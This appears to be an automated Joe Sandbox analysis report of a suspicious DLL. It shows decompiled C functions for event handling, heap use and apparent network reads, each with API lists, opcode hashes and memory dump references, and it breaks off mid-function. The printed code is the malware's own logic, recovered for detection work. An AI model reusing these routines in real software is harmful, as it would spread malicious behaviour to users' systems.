                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9111f
                                                                                                                                                                                                                                    0x02f9111f
                                                                                                                                                                                                                                    0x02f91129
                                                                                                                                                                                                                                    0x02f91109
                                                                                                                                                                                                                                    0x02f9110e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9110e
                                                                                                                                                                                                                                    0x02f91133
                                                                                                                                                                                                                                    0x02f91136
                                                                                                                                                                                                                                    0x02f91139
                                                                                                                                                                                                                                    0x02f91140
                                                                                                                                                                                                                                    0x02f91140
                                                                                                                                                                                                                                    0x02f9114d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9114d
                                                                                                                                                                                                                                    0x02f91048
                                                                                                                                                                                                                                    0x02f9104c
                                                                                                                                                                                                                                    0x02f9104d
                                                                                                                                                                                                                                    0x02f9104f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9104f
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 02F910C4
                                                                                                                                                                                                                                    • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 02F910DA
                                                                                                                                                                                                                                    • memset.NTDLL ref: 02F9117A
                                                                                                                                                                                                                                    • memset.NTDLL ref: 02F9118A
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memset$_allmul_aulldiv
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3041852380-0
                                                                                                                                                                                                                                    • Opcode ID: 525008a217d961cd222467a00e25274daa9dec5184e190afb970de5d3833c119
                                                                                                                                                                                                                                    • Instruction ID: 35c71e631f845620da1a94be6de534aaf72e65c977ac48e90e540dcc496376b0
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 525008a217d961cd222467a00e25274daa9dec5184e190afb970de5d3833c119
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8941B171A0024AABFF10DFA8DC44BEF7779EF44790F108539EA1AA7190DB71A9448F80
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02F9A9AB, Relevance: 6.1, APIs: 4, Instructions: 126stringCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?,00000008,76D24D40), ref: 02F9A9BD
                                                                                                                                                                                                                                      • Part of subcall function 02F92049: RtlAllocateHeap.NTDLL(00000000,00000000,02F97E50), ref: 02F92055
                                                                                                                                                                                                                                    • ResetEvent.KERNEL32(?), ref: 02F9AA31
                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02F9AA54
                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02F9AAFF
                                                                                                                                                                                                                                      • Part of subcall function 02F99039: HeapFree.KERNEL32(00000000,00000000,02F97F18,00000000,?,?,00000000), ref: 02F99045
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 943265810-0
                                                                                                                                                                                                                                    • Opcode ID: b5a1545aa241ab50631ea4a1d0cdb5984260ebb7ba7e2c520a14285794170a7a
                                                                                                                                                                                                                                    • Instruction ID: b0d0a8ccccb023b8dfb17f9172ff451eecea0d3f3d8e9bd9dfeb7d065aae5962
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b5a1545aa241ab50631ea4a1d0cdb5984260ebb7ba7e2c520a14285794170a7a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DB415172940208BFFB319F66DD49E6BBBBDEB89784F104919F252D10A0E7719994CB20
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02F939BF, Relevance: 6.1, APIs: 4, Instructions: 112COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 39%
                                                                                                                                                                                                                                    			E02F939BF(void* __eax, void* __ecx) {
				char _v8;
				void* _v12;
				intOrPtr _v16;
				char _v20;
				void* __esi;
				intOrPtr _t36;
				intOrPtr* _t37;
				intOrPtr* _t39;
				void* _t53;
				long _t58;
				void* _t59;

				_t53 = __ecx;
				_t59 = __eax;
				_t58 = 0;
				ResetEvent( *(__eax + 0x1c));
				_push( &_v8);
				_push(4);
				_push( &_v20);
				_push( *((intOrPtr*)(_t59 + 0x18)));
				if( *0x2f9d134() != 0) {
					L5:
					if(_v8 == 0) {
						 *((intOrPtr*)(_t59 + 0x30)) = 0;
						L21:
						return _t58;
					}
					 *0x2f9d168(0, 1,  &_v12);
					if(0 != 0) {
						_t58 = 8;
						goto L21;
					}
					_t36 = E02F92049(0x1000);
					_v16 = _t36;
					if(_t36 == 0) {
						_t58 = 8;
						L18:
						_t37 = _v12;
						 *((intOrPtr*)( *_t37 + 8))(_t37);
						goto L21;
					}
					_push(0);
					_push(_v8);
					_push( &_v20);
					while(1) {
						_t39 = _v12;
						_t56 =  *_t39;
						 *((intOrPtr*)( *_t39 + 0x10))(_t39);
						ResetEvent( *(_t59 + 0x1c));
						_push( &_v8);
						_push(0x1000);
						_push(_v16);
						_push( *((intOrPtr*)(_t59 + 0x18)));
						if( *0x2f9d134() != 0) {
							goto L13;
						}
						_t58 = GetLastError();
						if(_t58 != 0x3e5) {
							L15:
							E02F99039(_v16);
							if(_t58 == 0) {
								_t58 = E02F97A07(_v12, _t59);
							}
							goto L18;
						}
						_t58 = E02F91C47( *(_t59 + 0x1c), _t56, 0xffffffff);
						if(_t58 != 0) {
							goto L15;
						}
						_t58 =  *((intOrPtr*)(_t59 + 0x28));
						if(_t58 != 0) {
							goto L15;
						}
						L13:
						_t58 = 0;
						if(_v8 == 0) {
							goto L15;
						}
						_push(0);
						_push(_v8);
						_push(_v16);
					}
				}
				_t58 = GetLastError();
				if(_t58 != 0x3e5) {
					L4:
					if(_t58 != 0) {
						goto L21;
					}
					goto L5;
				}
				_t58 = E02F91C47( *(_t59 + 0x1c), _t53, 0xffffffff);
				if(_t58 != 0) {
					goto L21;
				}
				_t58 =  *((intOrPtr*)(_t59 + 0x28));
				goto L4;
			}














                                                                                                                                                                                                                                    0x02f939bf
                                                                                                                                                                                                                                    0x02f939ce
                                                                                                                                                                                                                                    0x02f939d3
                                                                                                                                                                                                                                    0x02f939d5
                                                                                                                                                                                                                                    0x02f939da
                                                                                                                                                                                                                                    0x02f939db
                                                                                                                                                                                                                                    0x02f939e0
                                                                                                                                                                                                                                    0x02f939e1
                                                                                                                                                                                                                                    0x02f939ec
                                                                                                                                                                                                                                    0x02f93a1d
                                                                                                                                                                                                                                    0x02f93a22
                                                                                                                                                                                                                                    0x02f93ae5
                                                                                                                                                                                                                                    0x02f93ae8
                                                                                                                                                                                                                                    0x02f93aee
                                                                                                                                                                                                                                    0x02f93aee
                                                                                                                                                                                                                                    0x02f93a2f
                                                                                                                                                                                                                                    0x02f93a37
                                                                                                                                                                                                                                    0x02f93ae2
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f93ae2
                                                                                                                                                                                                                                    0x02f93a42
                                                                                                                                                                                                                                    0x02f93a49
                                                                                                                                                                                                                                    0x02f93a4c
                                                                                                                                                                                                                                    0x02f93ad4
                                                                                                                                                                                                                                    0x02f93ad5
                                                                                                                                                                                                                                    0x02f93ad5
                                                                                                                                                                                                                                    0x02f93adb
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f93adb
                                                                                                                                                                                                                                    0x02f93a52
                                                                                                                                                                                                                                    0x02f93a54
                                                                                                                                                                                                                                    0x02f93a5a
                                                                                                                                                                                                                                    0x02f93a5b
                                                                                                                                                                                                                                    0x02f93a5b
                                                                                                                                                                                                                                    0x02f93a5e
                                                                                                                                                                                                                                    0x02f93a61
                                                                                                                                                                                                                                    0x02f93a67
                                                                                                                                                                                                                                    0x02f93a6c
                                                                                                                                                                                                                                    0x02f93a6d
                                                                                                                                                                                                                                    0x02f93a72
                                                                                                                                                                                                                                    0x02f93a75
                                                                                                                                                                                                                                    0x02f93a80
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f93a88
                                                                                                                                                                                                                                    0x02f93a90
                                                                                                                                                                                                                                    0x02f93ab9
                                                                                                                                                                                                                                    0x02f93abc
                                                                                                                                                                                                                                    0x02f93ac3
                                                                                                                                                                                                                                    0x02f93ace
                                                                                                                                                                                                                                    0x02f93ace
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f93ac3
                                                                                                                                                                                                                                    0x02f93a9c
                                                                                                                                                                                                                                    0x02f93aa0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f93aa2
                                                                                                                                                                                                                                    0x02f93aa7
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f93aa9
                                                                                                                                                                                                                                    0x02f93aa9
                                                                                                                                                                                                                                    0x02f93aae
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f93ab0
                                                                                                                                                                                                                                    0x02f93ab1
                                                                                                                                                                                                                                    0x02f93ab4
                                                                                                                                                                                                                                    0x02f93ab4
                                                                                                                                                                                                                                    0x02f93a5b
                                                                                                                                                                                                                                    0x02f939f4
                                                                                                                                                                                                                                    0x02f939fc
                                                                                                                                                                                                                                    0x02f93a15
                                                                                                                                                                                                                                    0x02f93a17
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f93a17
                                                                                                                                                                                                                                    0x02f93a08
                                                                                                                                                                                                                                    0x02f93a0c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f93a12
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • ResetEvent.KERNEL32(?), ref: 02F939D5
                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02F939EE
                                                                                                                                                                                                                                      • Part of subcall function 02F91C47: WaitForMultipleObjects.KERNEL32(00000002,02F9AA72,00000000,02F9AA72,?,?,?,02F9AA72,0000EA60), ref: 02F91C62
                                                                                                                                                                                                                                    • ResetEvent.KERNEL32(?), ref: 02F93A67
                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02F93A82
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ErrorEventLastReset$MultipleObjectsWait
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2394032930-0
                                                                                                                                                                                                                                    • Opcode ID: 4b805bb95e4f13e1244510d1fa6e74fe81655207a8ceda726d6b45cda690f622
                                                                                                                                                                                                                                    • Instruction ID: 2a4c2098c8f28113aa87c58c0c6c785a27d3b633afd273ef761b91560f65e5eb
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4b805bb95e4f13e1244510d1fa6e74fe81655207a8ceda726d6b45cda690f622
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D431C936E00604ABEF22DBA5DC44F6EB7BAEF887E4F1005A9E615D7190E730E945CB10
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02F942EA, Relevance: 6.1, APIs: 4, Instructions: 95synchronizationCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                                                                                                                    			E02F942EA(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				short* _t19;
				void* _t25;
				void* _t26;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0x2f9d270; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0x2f9d27c; // 0x44a5a8
				_t3 = _t8 + 0x2f9e862; // 0x61636f4c
				_t25 = 0;
				_t30 = E02F97A9A(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x2f9d2a8, 1, 0, _t30);
					E02F99039(_t30);
				}
				_t12 =  *0x2f9d25c; // 0x2000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E02F9757F() != 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t31 = E02F9205E(_t32, _t26);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t19 =  *0x2f9d0f0( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 = _t19 + 2;
					}
					_t31 = E02F9A501(0,  *_t32, _t19, 0);
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}















                                                                                                                                                                                                                                    0x02f942eb
                                                                                                                                                                                                                                    0x02f942f2
                                                                                                                                                                                                                                    0x02f942fc
                                                                                                                                                                                                                                    0x02f94300
                                                                                                                                                                                                                                    0x02f94306
                                                                                                                                                                                                                                    0x02f94315
                                                                                                                                                                                                                                    0x02f9431c
                                                                                                                                                                                                                                    0x02f94320
                                                                                                                                                                                                                                    0x02f94332
                                                                                                                                                                                                                                    0x02f94334
                                                                                                                                                                                                                                    0x02f94334
                                                                                                                                                                                                                                    0x02f94339
                                                                                                                                                                                                                                    0x02f94340
                                                                                                                                                                                                                                    0x02f94395
                                                                                                                                                                                                                                    0x02f94395
                                                                                                                                                                                                                                    0x02f9439b
                                                                                                                                                                                                                                    0x02f9439d
                                                                                                                                                                                                                                    0x02f9439d
                                                                                                                                                                                                                                    0x02f943a7
                                                                                                                                                                                                                                    0x02f943ab
                                                                                                                                                                                                                                    0x02f943bd
                                                                                                                                                                                                                                    0x02f943bd
                                                                                                                                                                                                                                    0x02f943c1
                                                                                                                                                                                                                                    0x02f943c7
                                                                                                                                                                                                                                    0x02f943c7
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f94359
                                                                                                                                                                                                                                    0x02f9435e
                                                                                                                                                                                                                                    0x02f94366
                                                                                                                                                                                                                                    0x02f94368
                                                                                                                                                                                                                                    0x02f9436c
                                                                                                                                                                                                                                    0x02f9436c
                                                                                                                                                                                                                                    0x02f94379
                                                                                                                                                                                                                                    0x02f9437d
                                                                                                                                                                                                                                    0x02f94381
                                                                                                                                                                                                                                    0x02f943d6
                                                                                                                                                                                                                                    0x02f943dc
                                                                                                                                                                                                                                    0x02f943dc
                                                                                                                                                                                                                                    0x02f9438f
                                                                                                                                                                                                                                    0x02f94393
                                                                                                                                                                                                                                    0x02f943ca
                                                                                                                                                                                                                                    0x02f943cc
                                                                                                                                                                                                                                    0x02f943cf
                                                                                                                                                                                                                                    0x02f943cf
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f943cc
                                                                                                                                                                                                                                    0x02f94393
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9437d

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 02F97A9A: lstrlen.KERNEL32(02F923E9,00000000,00000000,00000027,00000005,00000000,00000000,02F996DA,74666F53,00000000,02F923E9,02F9D00C,?,02F923E9), ref: 02F97AD0
                                                                                                                                                                                                                                      • Part of subcall function 02F97A9A: lstrcpy.KERNEL32(00000000,00000000), ref: 02F97AF4
                                                                                                                                                                                                                                      • Part of subcall function 02F97A9A: lstrcat.KERNEL32(00000000,00000000), ref: 02F97AFC
                                                                                                                                                                                                                                    • CreateEventA.KERNEL32(02F9D2A8,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,02F93CA0,?,00000001,?), ref: 02F9432B
                                                                                                                                                                                                                                      • Part of subcall function 02F99039: HeapFree.KERNEL32(00000000,00000000,02F97F18,00000000,?,?,00000000), ref: 02F99045
                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,00004E20,02F93CA0,00000000,00000000,?,00000000,?,02F93CA0,?,00000001,?,?,?,?,02F96880), ref: 02F94389
                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,02F93CA0,?,00000001,?), ref: 02F943B7
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,02F93CA0,?,00000001,?,?,?,?,02F96880), ref: 02F943CF
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 73268831-0
                                                                                                                                                                                                                                    • Opcode ID: ac36d348cbf18942477f7132586987f17d44d56b180bbcf31a1c021dbab85eac
                                                                                                                                                                                                                                    • Instruction ID: d027a52ab59715269ed5c3dc0822eaefc7afe8352b45d1157714750185aa5f7b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ac36d348cbf18942477f7132586987f17d44d56b180bbcf31a1c021dbab85eac
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 40213432D403159BEF316FB8AC44F6AB3E9AB98BD4F150615FF55DB100D761C8129690
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02F9A0B2, Relevance: 6.1, APIs: 4, Instructions: 92synchronizationCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 38%
                                                                                                                                                                                                                                    			E02F9A0B2(void* __ecx, void* __esi) {
				char _v8;
				long _v12;
				char _v16;
				long _v20;
				long _t34;
				long _t39;
				long _t42;
				long _t56;
				intOrPtr _t58;
				void* _t59;
				intOrPtr* _t60;
				void* _t61;

				_t61 = __esi;
				_t59 = __ecx;
				_t60 =  *0x2f9d144; // 0x2f9ad81
				 *((intOrPtr*)(__esi + 0x2c)) = 0;
				do {
					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
					_v20 = _t34;
					if(_t34 != 0) {
						L3:
						_push( &_v16);
						_push( &_v8);
						_push(_t61 + 0x2c);
						_push(0x20000013);
						_push( *((intOrPtr*)(_t61 + 0x18)));
						_v8 = 4;
						_v16 = 0;
						if( *_t60() == 0) {
							_t39 = GetLastError();
							_v12 = _t39;
							if(_v20 == 0 || _t39 != 0x2ef3) {
								L15:
								return _v12;
							} else {
								goto L11;
							}
						}
						if(_v8 != 4 ||  *((intOrPtr*)(_t61 + 0x2c)) == 0) {
							goto L11;
						} else {
							_v16 = 0;
							_v8 = 0;
							 *_t60( *((intOrPtr*)(_t61 + 0x18)), 0x16, 0,  &_v8,  &_v16);
							_t58 = E02F92049(_v8 + 1);
							if(_t58 == 0) {
								_v12 = 8;
							} else {
								_push( &_v16);
								_push( &_v8);
								_push(_t58);
								_push(0x16);
								_push( *((intOrPtr*)(_t61 + 0x18)));
								if( *_t60() == 0) {
									E02F99039(_t58);
									_v12 = GetLastError();
								} else {
									 *((char*)(_t58 + _v8)) = 0;
									 *((intOrPtr*)(_t61 + 0xc)) = _t58;
								}
							}
							goto L15;
						}
					}
					SetEvent( *(_t61 + 0x1c));
					_t56 =  *((intOrPtr*)(_t61 + 0x28));
					_v12 = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					goto L3;
					L11:
					_t42 = E02F91C47( *(_t61 + 0x1c), _t59, 0xea60);
					_v12 = _t42;
				} while (_t42 == 0);
				goto L15;
			}















                                                                                                                                                                                                                                    0x02f9a0b2
                                                                                                                                                                                                                                    0x02f9a0b2
                                                                                                                                                                                                                                    0x02f9a0bc
                                                                                                                                                                                                                                    0x02f9a0c2
                                                                                                                                                                                                                                    0x02f9a0c5
                                                                                                                                                                                                                                    0x02f9a0c9
                                                                                                                                                                                                                                    0x02f9a0d1
                                                                                                                                                                                                                                    0x02f9a0d4
                                                                                                                                                                                                                                    0x02f9a0ed
                                                                                                                                                                                                                                    0x02f9a0f0
                                                                                                                                                                                                                                    0x02f9a0f4
                                                                                                                                                                                                                                    0x02f9a0f8
                                                                                                                                                                                                                                    0x02f9a0f9
                                                                                                                                                                                                                                    0x02f9a0fe
                                                                                                                                                                                                                                    0x02f9a101
                                                                                                                                                                                                                                    0x02f9a108
                                                                                                                                                                                                                                    0x02f9a10f
                                                                                                                                                                                                                                    0x02f9a162
                                                                                                                                                                                                                                    0x02f9a16b
                                                                                                                                                                                                                                    0x02f9a16e
                                                                                                                                                                                                                                    0x02f9a1a9
                                                                                                                                                                                                                                    0x02f9a1af
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9a16e
                                                                                                                                                                                                                                    0x02f9a115
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9a11c
                                                                                                                                                                                                                                    0x02f9a12a
                                                                                                                                                                                                                                    0x02f9a12d
                                                                                                                                                                                                                                    0x02f9a130
                                                                                                                                                                                                                                    0x02f9a13c
                                                                                                                                                                                                                                    0x02f9a140
                                                                                                                                                                                                                                    0x02f9a1a2
                                                                                                                                                                                                                                    0x02f9a142
                                                                                                                                                                                                                                    0x02f9a145
                                                                                                                                                                                                                                    0x02f9a149
                                                                                                                                                                                                                                    0x02f9a14a
                                                                                                                                                                                                                                    0x02f9a14b
                                                                                                                                                                                                                                    0x02f9a14d
                                                                                                                                                                                                                                    0x02f9a154
                                                                                                                                                                                                                                    0x02f9a192
                                                                                                                                                                                                                                    0x02f9a19d
                                                                                                                                                                                                                                    0x02f9a156
                                                                                                                                                                                                                                    0x02f9a159
                                                                                                                                                                                                                                    0x02f9a15d
                                                                                                                                                                                                                                    0x02f9a15d
                                                                                                                                                                                                                                    0x02f9a154
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9a140
                                                                                                                                                                                                                                    0x02f9a115
                                                                                                                                                                                                                                    0x02f9a0d9
                                                                                                                                                                                                                                    0x02f9a0df
                                                                                                                                                                                                                                    0x02f9a0e4
                                                                                                                                                                                                                                    0x02f9a0e7
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9a177
                                                                                                                                                                                                                                    0x02f9a17f
                                                                                                                                                                                                                                    0x02f9a186
                                                                                                                                                                                                                                    0x02f9a186
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,76D681D0), ref: 02F9A0C9
                                                                                                                                                                                                                                    • SetEvent.KERNEL32(?), ref: 02F9A0D9
                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02F9A162
                                                                                                                                                                                                                                      • Part of subcall function 02F91C47: WaitForMultipleObjects.KERNEL32(00000002,02F9AA72,00000000,02F9AA72,?,?,?,02F9AA72,0000EA60), ref: 02F91C62
                                                                                                                                                                                                                                      • Part of subcall function 02F99039: HeapFree.KERNEL32(00000000,00000000,02F97F18,00000000,?,?,00000000), ref: 02F99045
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000), ref: 02F9A197
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 602384898-0
                                                                                                                                                                                                                                    • Opcode ID: 8039e57f6a4b43a8786894369ea3e29f81f7b551263c50741edf90c9b04e8890
                                                                                                                                                                                                                                    • Instruction ID: 17d726844e980715492b04a078293dcbc6962c58d7645c669d3591e15d03a641
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8039e57f6a4b43a8786894369ea3e29f81f7b551263c50741edf90c9b04e8890
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D431CBB5D00209EFFF21DF95CC8099EBBB9EB08784F10496AE642E2151D771AA85DF60
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02F93BF1, Relevance: 6.1, APIs: 4, Instructions: 87sleepCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 40%
                                                                                                                                                                                                                                    			E02F93BF1(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
